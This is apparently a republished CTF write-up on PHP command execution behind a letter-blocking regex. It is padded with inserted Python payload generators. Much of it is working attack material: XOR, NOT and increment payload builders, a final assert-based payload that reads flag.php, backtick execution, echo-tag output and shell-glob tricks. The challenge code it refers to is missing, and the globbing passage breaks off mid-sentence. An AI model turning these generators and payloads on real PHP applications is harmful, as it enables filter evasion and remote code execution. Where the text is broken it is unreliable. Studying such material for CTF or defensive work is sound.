2025-02-23 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article discusses command execution in CTF starting from a PHP challenge. The content is fairly detailed; interested readers can refer to it, and I hope it is helpful.
When I was about to go to sleep I opened bilibili and found a message from a user asking me to help look at a problem. I happened to be free, so I opened the link he sent. The code is as follows.
It is clearly a PHP code-audit challenge: arbitrary command execution is possible as soon as the if check on the third line is bypassed.
Solution idea
Looking at the code, it is a common type of challenge. To get past the regular expression /[a-zA-Z]/ (which rejects any letter), we can use PHP's dynamic function calls together with its string operators to construct the function name without typing a single letter.
There are three ways to construct the desired string:
1. XOR
In PHP, XORing two strings XORs them byte by byte (by ASCII code) and returns a new string whose length is that of the shorter operand. We can use this to build the characters we need from characters that pass the filter.
For example, to construct phpinfo we can use a script to find a pair of strings, here '0302181' and '@[@[_^^', whose byte-wise XOR is phpinfo. In that script, valid is the set of usable characters and answer is the string to construct. Once we have such a pair, how do we execute it? We store the XOR result in a variable and then call that variable as a dynamic function. For the variable name, PHP follows the same rules as C, so a name consisting only of underscores is valid and $_ can hold the result.
2. Bitwise NOT
Like XOR, this relies on PHP applying bitwise operators to strings byte by byte. In some cases NOT is more convenient than XOR: with XOR, some characters cannot be produced from the allowed set at all, whereas NOT can use the bytes of Chinese characters or other high bytes, which a letter filter will not block. For example, ~('和'{2}) gives the letter s: the third UTF-8 byte of 和 is 0x8C, and inverting it yields 0x73, which is s. To get the same s with XOR you would have to find two allowed characters whose XOR is s. (The curly-brace string offset syntax was removed in PHP 8; use '和'[2] there.)
The script for finding NOT constructions is similar to the XOR one and is not given here.
3. Increment
$a = 'a'; $a++; // $a is now 'b'
This relies on PHP being weakly typed: applying ++ to a non-numeric string does not convert it to a number but increments it character-wise, Perl-style ('a' becomes 'b', 'z' becomes 'aa'), so letters can be reached from a single seed character without ever typing one. Many code-audit challenges build on this kind of implicit behaviour.
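As an added example, not from the original post, the following Python models the logic of PHP's increment_string() (the routine behind $s++ on strings) and uses it to plan a payload that contains no letters or digits. The seed trick it assumes, obtaining "Array" by array-to-string conversion and indexing it with a false comparison to get 'A', goes beyond the page's one-line ++ illustration; it is a standard construction and is stated here as the example's assumption, as are the helper names.

```python
"""Model PHP's string increment ($s++) and plan a letter-free payload from it."""

# (low, high, character prepended when the carry runs off the left end)
CLASSES = (("a", "z", "a"), ("A", "Z", "A"), ("0", "9", "1"))


def php_increment(s: str) -> str:
    """Perl-style increment as implemented by PHP's increment_string().

    Walks right to left: a..z / A..Z / 0..9 step forward; 'z', 'Z', '9' wrap to
    'a', 'A', '0' and carry; any other byte stops the walk. A carry off the left
    end prepends 'a', 'A' or '1' according to the class of the leftmost character
    processed. Real PHP first converts numeric strings ("9", "1e3") to numbers;
    this model is for alphabetic seeds, which is the CTF use.
    """
    if s == "":
        return "1"  # PHP: incrementing "" yields "1"
    chars = list(s)
    pos, carry, prefix = len(chars) - 1, False, None
    while pos >= 0:
        ch = chars[pos]
        for low, high, pre in CLASSES:
            if low <= ch <= high:
                break
        else:
            carry = False  # non-alphanumeric byte: stop without propagating
            break
        prefix = pre
        if ch == high:
            chars[pos], carry = low, True
            pos -= 1
        else:
            chars[pos], carry = chr(ord(ch) + 1), False
            break
    if carry:
        chars.insert(0, prefix)
    return "".join(chars)


def increments_needed(start: str, target: str, limit: int = 100):
    """Number of ++ steps from `start` to `target`, or None if not reached within `limit`."""
    s, n = start, 0
    while s != target:
        if n >= limit:
            return None
        s, n = php_increment(s), n + 1
    return n


def increment_payload(word: str) -> str:
    """PHP with no letters or digits that leaves uppercase `word` in $_.

    Seed (assumption, standard construction): $_=[]; $_=@"$_"; gives "Array"
    through array-to-string conversion, and $_[''=='$'] indexes it with false
    (0), yielding 'A'. Each letter is then reached by ++ from that 'A' in its own
    variable ($__, $___, ...) and the pieces are concatenated. PHP function names
    are case-insensitive, so ASSERT($_POST['_']) behaves like assert().
    """
    if not (word.isalpha() and word.isupper()):
        raise ValueError("the seed is 'A': only uppercase letters can be reached")
    code = ["$_=[];$_=@\"$_\";$_=$_[''=='$'];"]  # $_ === 'A'
    names = ["$" + "_" * (i + 2) for i in range(len(word))]
    for var, ch in zip(names, word):
        code.append(f"{var}=$_;" + f"{var}++;" * increments_needed("A", ch))
    code.append("$_=" + ".".join(names) + ";")
    return "".join(code)


if __name__ == "__main__":
    print(php_increment("Zz"))            # AAa
    print(increment_payload("ASSERT"))
```

The generated code ends with $_ holding the word, so a dynamic call such as $_($_POST['_']) completes the injection; because the seed can only reach uppercase letters, the word must be a function name (case-insensitive) rather than a variable name.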
Hitting obstacles
With the above approach phpinfo() executed successfully, so the next step was simply to construct a command-execution function and read the file. That is what I thought at the time, so I constructed passthru(), system(), shell_exec(), exec() and others, all of which were blocked and produced no output. Further debugging showed that these functions are disabled (I appended a print call after each function call to see whether execution continued past it).
I was stuck here for a long time and tried printing $GLOBALS and so on without finding anything useful. Finally, by scanning the directory with glob(), I found the flag.php file and read it with file_get_contents(). The final payload is as follows:
?mess=$_="`0134"^"?`~``";${$_}[_](${$_}[__]);
with the following in the POST body:
_=assert&__=print_r(base64_encode(file_get_contents("flag.php")))
Here "`0134"^"?`~``" XORs to _POST, so the injected code becomes $_POST[_]($_POST[__]), that is, assert() evaluating the print_r(...) string, and the flag is read from the response. I did not XOR-construct the whole string in the final payload because it would have been far too long; instead I constructed the dynamic call $_POST[_]($_POST[__]) so that the function name and its argument could be supplied directly in other parameters. Two version caveats: assert() evaluates a string argument as code only up to PHP 7 (PHP 8 treats it like any other argument), and the bare index [_] relies on an undefined constant degrading to the string "_", which PHP 8 turns into an Error (use ['_'], which still contains no letters).
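As an added example (not the author's script, which the page does not reproduce), the following Python models PHP's byte-wise string ^ and ~ and searches an allowed character set for XOR pairs. It covers the XOR and NOT construction sections above as well as the letter-free $_POST[...](...) stub used in the final payload. The allowed set VALID (printable ASCII without letters, and without the characters that would break a double-quoted PHP literal) and all helper names are assumptions; the string pairs it checks are the ones quoted on this page.

```python
"""Find letter-free XOR / NOT constructions for PHP strings such as function names."""
from urllib.parse import quote_from_bytes

# Assumption: the filter is /[a-zA-Z]/, so printable ASCII minus letters survives.
# '"', '\' and '$' are also excluded so the result can sit inside a double-quoted
# PHP string literal without escaping or interpolation. Narrow this to the
# challenge's real whitelist when needed.
VALID = [chr(c) for c in range(0x21, 0x7F)
         if not (chr(c).isalpha() or chr(c) in '"\\$')]


def php_xor(a: str, b: str) -> str:
    """PHP's `^` on two strings: XOR of each byte pair, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def php_not(data: bytes) -> str:
    """PHP's `~` on a string: every byte inverted; decoded as latin-1 to keep bytes 1:1."""
    return bytes((~b) & 0xFF for b in data).decode("latin-1")


def xor_pair(target: str, valid=VALID):
    """Return (a, b), both drawn from `valid`, such that php_xor(a, b) == target.

    This is what the page's valid/answer script does: for each target byte, scan
    the allowed set for an x whose partner target ^ x is allowed as well.
    """
    a, b = [], []
    for ch in target:
        for x in valid:
            y = chr(ord(ch) ^ ord(x))
            if y in valid:
                a.append(x)
                b.append(y)
                break
        else:
            raise ValueError(f"no allowed XOR pair for {ch!r}")
    return "".join(a), "".join(b)


def not_bytes(target: str) -> bytes:
    """Bytes whose inversion is `target`. Inverting ASCII always gives bytes >= 0x80,
    so a NOT construction needs no pair search and can never contain a letter."""
    return bytes((~b) & 0xFF for b in target.encode())


def xor_call(func: str) -> str:
    """$_="a"^"b";$_();  -- build `func` by XOR and call it as a dynamic function."""
    a, b = xor_pair(func)
    return f'$_="{a}"^"{b}";$_();'


def not_call_bytes(func: str) -> bytes:
    """$_=~"<raw bytes>";$_();  -- the inverted bytes go in raw, never as \\xNN
    escapes, because the 'x' in an escape is itself a letter."""
    return b'$_=~"' + not_bytes(func) + b'";$_();'


def not_call(func: str) -> str:
    """The NOT payload percent-encoded for a query string or form body."""
    return quote_from_bytes(not_call_bytes(func), safe="")


def indirect_call(superglobal: str = "_POST", fn_key: str = "_", arg_key: str = "__") -> str:
    """Letter-free stub $<superglobal>[fn_key]($<superglobal>[arg_key]) so the real
    function name and its argument travel in other request fields, as in the final
    payload on this page. Keys are quoted because bare `_` relied on an undefined
    constant degrading to a string, which PHP 8 turns into an Error."""
    a, b = xor_pair(superglobal)
    return f'$_="{a}"^"{b}";${{$_}}[\'{fn_key}\'](${{$_}}[\'{arg_key}\']);'


if __name__ == "__main__":
    print(xor_pair("phpinfo"), xor_call("phpinfo"))
    print(not_call("phpinfo"))
    print(indirect_call())
```

The search takes the first allowed partner it finds, so its pairs differ from the ones the author used; any pair in the allowed set is equally valid. The NOT variant is returned as bytes and as a percent-encoded string because the high bytes must reach PHP raw.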
Deeper analysis
That is the end of the challenge. It was not very difficult: first construct dynamic functions through PHP's string features, then, on finding that command execution is disabled, fall back on other functions to obtain information. But after finishing it I kept thinking: is this the only way to execute commands in PHP? Certainly not. So I have summarised several further command-execution tricks for reference.
1. When print functions are disabled
Without a print function you cannot see output, so even when a command executes successfully you get no information and need another channel for the result.
First, many blogs online describe the out-of-band approach: if phpinfo shows that curl or another file-transfer extension is enabled, you set up a server you control, have it store every request in a database or file, send the output to your own address and read it from the log. This works but is inconvenient and has its limits. What I want to introduce here is a different approach.
If you have developed web applications with Django or JSP, you know you can output a variable with {{ xxx }} or <%= xxx %>. Does PHP have something similar? Yes: the short echo tag <?= $var ?> outputs a variable. So when the injection point is inside eval(), you can close PHP mode with ?> and reopen it with the echo tag:
$_ = "xxx"; ?><?= $_ ?>
This prints the contents of $_ to the page. The key point is that <?= has been unconditionally available since PHP 5.4, independent of the short_open_tag setting, so a blacklist on print, echo or var_dump does not catch it, and administrators easily overlook it; it also contains no letters, so it passes the filter in this challenge. It is worth a try when doing challenges.
2. Other ways of executing commands
When system and passthru are unavailable, the usual advice online is to use popen or proc_open to run commands through a pipe, which is fine. Another route is the backtick operator: in PHP, text enclosed in two backticks is executed as a shell command and its output is returned, so the following runs a command:
$_ = `ls`;
Caveat: the backtick operator is shell_exec() in disguise and is disabled whenever shell_exec() is listed in disable_functions, so it would not have helped against the challenge above, where shell_exec() was blocked; it helps when the filter is a keyword blacklist that forgot the operator.
3. When letters and digits cannot be used
When alphanumeric characters cannot be used, you can of course build the strings with the methods above, but here is something else: the shell on Linux supports pattern matching (globbing). Where you cannot type a character, use ? (any single character) or * (any run of characters) instead. The shell expands the pattern to every matching path in sorted order, and the first match becomes the command while the remaining matches become its arguments, so check the listing order under /bin on your own Linux box to see which commands can be reached this way, for example a pattern that resolves to
=> /bin/cat
In that case, if you want to read /var/www/html/index.php (you have to thank the Apache default directory for being so deep), you can get it directly using the
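Added example, not from the original article: a Python emulation of shell pathname expansion over a constructed directory listing (SAMPLE_FS, not a real system) that shows why the expansion order matters and how to check whether a letter-free pattern selects the intended file uniquely. The pattern /???/??? and the file names are assumptions for illustration; on a real target, ls /bin decides.

```python
"""Emulate shell pathname expansion to plan letter-free globs such as /???/???."""
from fnmatch import fnmatchcase

# Constructed listing standing in for the target's /bin and webroot (assumption).
SAMPLE_FS = [
    "/bin/bash", "/bin/bat", "/bin/cat", "/bin/chmod", "/bin/ls", "/bin/nc",
    "/bin/sh", "/bin/tar",
    "/var/www/html/index.php", "/var/www/html/flag.php",
]


def shell_expand(pattern: str, paths) -> list:
    """Paths matching `pattern`, sorted the way the shell sorts expansions.

    Matching is done per '/'-separated segment because fnmatch lets '?' and '*'
    match '/', which real pathname expansion never does. Sorting here is bytewise;
    bash sorts by LC_COLLATE, which can reorder mixed-case names. If nothing
    matches, POSIX shells pass the pattern through literally, so we do the same.
    """
    segs = pattern.split("/")
    hits = sorted(
        p for p in paths
        if len(p.split("/")) == len(segs)
        and all(fnmatchcase(s, q) for s, q in zip(p.split("/"), segs))
    )
    return hits or [pattern]


def command_line(pattern: str, paths):
    """(argv0, args) the shell runs for a bare `pattern` word: the first expansion
    is the command and every further expansion becomes an argument to it."""
    words = shell_expand(pattern, paths)
    return words[0], words[1:]


def letterless_glob(target: str, paths):
    """Replace letters and digits in `target` with '?' and report what the
    resulting pattern expands to, so a collision (another path sorting before
    the target and thus being executed or read instead) is visible."""
    pattern = "".join("?" if c.isalnum() else c for c in target)
    return pattern, shell_expand(pattern, paths)


if __name__ == "__main__":
    print(command_line("/???/???", SAMPLE_FS))
    print(letterless_glob("/bin/cat", SAMPLE_FS))
    print(letterless_glob("/var/www/html/index.php", SAMPLE_FS))
```

In the sample listing /???/??? expands to bat, cat and tar in that order, so the shell would run /bin/bat with the other two paths as its arguments; the webroot file, by contrast, is selected uniquely because its letter count differs from flag.php. Run the same check against the real listing before relying on a pattern.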
This article only covers a few things that grew out of this problem. In real challenges the situation may be more complicated, with limits on length or on parameters and so on, so the approach cannot always be the same, and sometimes we may even need to use a CVE. The purpose of this article is to show readers something they may not have seen before.
That is all on command execution in PHP starting from a CTF challenge. I hope the above is of some help and that you can learn something from it. If you think the article is good, share it so more people can see it.